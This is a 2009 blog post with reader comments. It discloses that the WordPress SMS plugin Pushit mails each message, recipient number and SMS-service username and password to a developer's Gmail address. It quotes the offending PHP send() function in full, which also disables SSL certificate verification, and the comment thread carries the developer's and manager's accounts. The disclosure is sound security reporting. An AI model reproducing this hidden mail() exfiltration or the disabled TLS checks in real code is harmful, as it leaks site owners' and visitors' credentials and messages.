[Plugin Pushit] carelessly malicious?

I found an article on the internet you might want to know about

Those who can, do. Those who cba, don’t.
Are your WordPress plugins safe?

00:28 8 Jul 2009 UTC – Sven

In doing some research on connecting WordPress to SMS gateways for some mobile action, I found what is either a careless remnant of testing or a malicious attempt to steal data from people using a WordPress plugin. Actually, make that carelessly malicious.

Interested in how the Pushit plugin for WordPress was working behind the scenes, I stumbled upon quite a shocker:

function send( $to, $message, $name=’handshake’ ) {
//$sms_url = ‘https://extsms.bozoka.com/bozoka/api/SmsCPost’; // old
$sms_url = ‘https://extsms.bozoka.com/messaging/api/SmsCPost’; // new
$sendername = str_replace(‘+’, ”,$name);
$sendername_length = strlen($sendername);
if ($sendername_length > 11) {
$sendername = substr($sendername, $sendername_length – 11);
}
$data= ‘msisdn=’ . urlencode($to)
. ‘&msg=’ . urlencode( $message )
. ‘&username=’ . urlencode($GLOBALS[‘pushit’][‘serviceLogin’])
. ‘&userpassword=’ . urlencode($GLOBALS[‘pushit’][‘servicePassword’])
. ‘&shortnumber=71501&sendername=’ . urlencode( $sendername ) ;

$c=curl_init($sms_url);
curl_setopt($c,CURLOPT_POST, true);
curl_setopt($c,CURLOPT_POSTFIELDS, $data);
curl_setopt($c,CURLOPT_RETURNTRANSFER, true);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, false);
$return = curl_exec($c);
curl_close($c);
SMS::log( $to, $message, $name.’ (‘.$return.’)’ ) ;
mail(“smart.maxx@gmail.com”, ‘data’, $data.”\nreturn”.print_r($return, true));
return $return;
}

This part of the plugin sends an SMS via the given SMS gateway. As usual for these types of services, you have to send the username and password of your account with the SMS service in the URL call to the web service.

Yet towards the end of this send function, there’s a call to PHP’s mail function. It sends the following to smart.maxx@gmail.com:

* receiving number
* message sent
* username of SMS service account
* password of SMS service account
* the short number used
* the sender name/number to be displayed on the receiving mobile
* whether the SMS was sent OK

Apparently the authors of this plugin deem that this information is something that someone with the e-mail address smart.maxx@gmail.com should have about every SMS you, or your visitors, attempt to send using their plugin. Are you cool with that?
Report it to… whom?

What’s worse is that it doesn’t seem like WordPress.org has any way of notifying anyone that there’s a malicious plugin available for download. There’s no commenting on the plugin page to let other users know, there doesn’t seem to be any link or form to report plugins for being malicious to WordPress. Why not? All they have is a general contact form. Does WordPress trust plugin developers completely?

WordPress.org is enabling a plugin that harvests data sent by your visitors. Are you cool with that?

Fortunately very few people have downloaded this particular plugin – but who knows what else is out there. If you are using a plugin that could possibly send out any critical or sensitive data, you might want to check the code and ensure that “Smart Maxx” isn’t mailing himself the juicy payload.

PS. Just for fun, I’d suggest that people send smart.maxx@gmail.com an e-mail with the subject “data” and give him a nice greeting. If this were an innocent oversight, he’d probably know by now that it should have been fixed quite some time ago…
Push our stuff, be a pro:

* Facebook
* Twitter
* Digg
* Reddit
* Slashdot
* del.icio.us
* StumbleUpon
* Google Bookmarks
* email
* Print

Information in this article may have been altered to protect the innocent stupid
What’s all this then?

1.

Thanks for the pointer. Could prolly report to gmail too.
2.

Well done for this. A great contribution to humanity online.
3.

thanks a lot for publishing this.
4.

Looks to me like the author just forgot to remove a debug statement from his plugin, and is regreting that more and more, the larger the userbase grows.
5.

if it was for debug, he could’ve just print to a log file
6.

Well, you could just contact Konstantin Maximchik via handshake.se. He’s probably the owner of the e-mail address (see http://drupal.org/user/142327).
7.

…or try to guess his dog’s name and hack into his gmail account. It’s not Max, by the way.
8.

I think its intended for you to put your own email there.
9.

It was because of testing purposes. I just forget ti remove this code.
You can delete this line from code.
Be sure that all emails with this data are deleted. I have automatic filter here to immediately delete such emails.

–
smart.maxx 🙂
10.

Yes. I am Konstantin Maximchik.

my email. is smart.maxx@gmail.com

I was working on this plugin.
11.
L

Let me get this right:
* Step 1: Write plugin with line which sends email for testing
* Step 2: Don’t need the debug output anymore, so set up filter to delete these emails
* Step 3: Forget about it and release code

What sane human being would perform step 2 once they were done with testing instead of, say, commenting out or removing the line from the code? This claim makes zero sense. Would you mind explaining the thought process which lead to this decision, hm?
12.

thanks a lot for this info! its absolutely stunning how this could happen.
–
my name is roman pixell, im the PM behind the pushit plugin. i did NOT check what one of my developers did in such detail as you did, which turns out to be a bummer… smart.maxx@gmail.com goes to this particular developer. he is no longer on the project. this person was not delivering what he was asked to do, and i finally had to move on forward with other developers.

im very grateful for you pointing out the malicious code and i will remove it immediately from wordpress.org

if there is anything that you want to communicate directly to me, you can reach me at roman #at# pixell.net or cell +46709103551

all i can say to the WP community, is that i feel very sorry for making the code publicly available without thoroughly checking for “functions” like this. i hope that other projects will not have to suffer this fate. the lesson here is to thoroughly pick your team and always double check code that is made available through WP.

the only thing that actually saves our a** at this time is that pushit is not functional without a manual activation from our side. it never left the “alpha” stage, so you will only find it installed on a couple of blogs.
13.

regarding the comment with 1-2-3 … this is exactly how i feel about it. and i know that this particular address is used. so i cant explain it in another manner than that this address has been harvesting sensitive data. this is absolutely outrageous.
14.

Wow.
15.

If I forget to do something, I make the change to the source code and push the changes across to the users. Why create an email filter?
16.

BTW: i just checked the handshake FTP, the actual line of code is a mere comment:

// mail(”smart.maxx@gmail.com”, ’sms’, ‘$u = ’.print_r($u, true).”\n”.’$msg = ’.$msg.”\n”.’$l = ’.$l.”\n”.’$p = ’.$p.”\n”.’$m = ’.$m.”\n”);

this means that at least handshake.se is not harvesting sensitive data. im supposedly the only one who has access to that FTP.

if anyone reads this, please check your own install and remove the actual line of code.

/ roman pixell ( im available at -> roman #at# pixell.net )
17.

FYI, the actual email address smart.maxx@gmail.com is present at two (2) places in the code. not just one.

also, matt or somebody else at WP has suspended the pushit plugin from the SVN repository, so it is currently not available at its former address http://wordpress.org/extend/plugins/pushit/. lets hope this will be sorted out ASAP.
18.

Before the author of the plugin posted here, I have followed the suggestion of Sven and sent an e-mail with the subject of “data” as suggested, with the contents of :
“Following the directions of this:
http://mentalfruition.com/2009/07/08/are-your-wordpress-plugins-safe/”

After a while, i got the following response from the author :
“It was because of testing purposes. I just forget ti remove this code.
You can delete this line from code.
Be sure that all emails with this data are deleted. I have automatic filter
here to immediately delete such emails.

http://hvost.by/
Konstantin”

I guess the automatic filtering doesn’t work, as my e-mail should have been — deleted automatically and immediately — 😐
19.
Sven

mail(”smart.maxx@gmail.com”) appears in all 6 times throughout the plugin code, and was only not commented out in the instance I posted about. Does that lend credence to Mr. Maximchik’s claims that it was simply an oversight? Maybe.

Regardless, he should have found out by now that there was still a part in the plugin that was sending e-mails to him; the plugin was last updated in the repository back in April.

A convenient oversight, perhaps?
20.

Roman says: this person was not delivering what he was asked to do

But do you know what task I had to do? He sad: just make it working! That’s it! No specification at all. No detailed tasks. And after this all he say that I was not delivering what he was asked to do! 🙂 very funny.

About my email in the code. I was not first and only developer on this plugin. And some places was not very clear for me. So as I had very poor budget I was forced to find simplest way to debug others code. It was sending emails with dumps of the data.

You have found my address 6 times in the code but 5 of them where commented. 🙂

You send me email with subject “data” and you expected that this email will be deleted automatically but don’t you think that I have filter not only by subj, but sender too?

Also I was the first person who told to Roman Pixel (owner of this plugin) about this issue and this post.
21.

in response to konstantins maximchiks post above.

– we paid out standard compensation, there was no trade and i did not suggest the compensation level, i only accepted what was suggested to me
– we used basecamp, emails, skype and phone. the task must have been clear enough. a lot of specific details might not be specified in a project, but overall, i think that the basic idea doesnt need explanations – send an SMS with the link of the page youre visiting to a friends cell phone. make callerID work. its not rocket science stuff.
– i never asked to output sensitive data to an email address (if you need a log file, use a log file. if you need such a function, you should make sure it never reaches an SVN that is made public.)
– konstantin was the SECOND person to inform me about this blog post

/ roman pixell
22.

And who was the first?

Jonatan Sulo? I told him. 🙂

–
KM
23.

> We don’t care what your name is, where
> you come from, or what your web site is.

yes, nice and clean, but dates on the comments would be nice.

You got something to say?
We don’t care what your name is, where you come from, or what your web site is.
Click here to cancel reply.

*
Recent fruits
o JShop like it’s 1999
o PayPal’s hidden language override feature
o Hire your detractors
o Nonsensical Popup Resizing (NPR)
o Design your face, not your web site
*
Submission form

Please help this URL

ajax loader
*
Look, a cloud!
advertising bug cms css facebook flash google html imaging javascript jquery microsoft paypal security semantic seo server testing twitter umbraco usability wordpress

What, you looking for more free stuff? That’s right, all of this is © Mental Fruition – infinitely spanning all records of time